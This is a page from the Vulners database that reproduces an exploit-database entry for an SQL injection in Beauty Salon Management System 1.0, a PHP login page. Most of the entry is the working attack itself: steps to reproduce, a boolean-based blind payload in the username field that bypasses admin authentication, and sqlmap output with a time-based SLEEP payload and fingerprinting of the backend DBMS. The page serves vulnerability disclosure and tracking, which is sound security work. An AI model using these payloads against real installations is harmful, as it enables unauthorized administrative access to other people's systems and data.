Vulners
Lucene search
Beauty Salon Management System 1.0 SQL Injection
`# Exploit Title: Beauty Salon Management System v1.0 - SQLi
# Date of found: 04/07/2023
# Exploit Author: Fatih Nacar
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
# CWE: CWE-89
Vulnerability Description -
Beauty Salon Management System: V1.0, developed by Campcodes, has been
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
allows an attacker to manipulate login authentication with the SQL queries
and bypass authentication. The system fails to properly validate
user-supplied input in the username and password fields during the login
process, enabling an attacker to inject malicious SQL code. By exploiting
this vulnerability, an attacker can bypass authentication and gain
unauthorized access to the system.
Steps to Reproduce -
The following steps outline the exploitation of the SQL Injection
vulnerability in Beauty Salon Management System V1.0:
1. Open the admin login page by accessing the URL:
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
2. In the username and password fields, insert the following SQL Injection
payload shown inside brackets to bypass authentication for usename
parameter:
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In}
3.Execute the SQL Injection payload.
As a result of successful exploitation, the attacker gains unauthorized
access to the system and is logged in with administrative privileges.
Sqlmap results:
POST parameter 'username' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 793
HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
rvYF&password=test&login=Sign In
---
[15:58:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1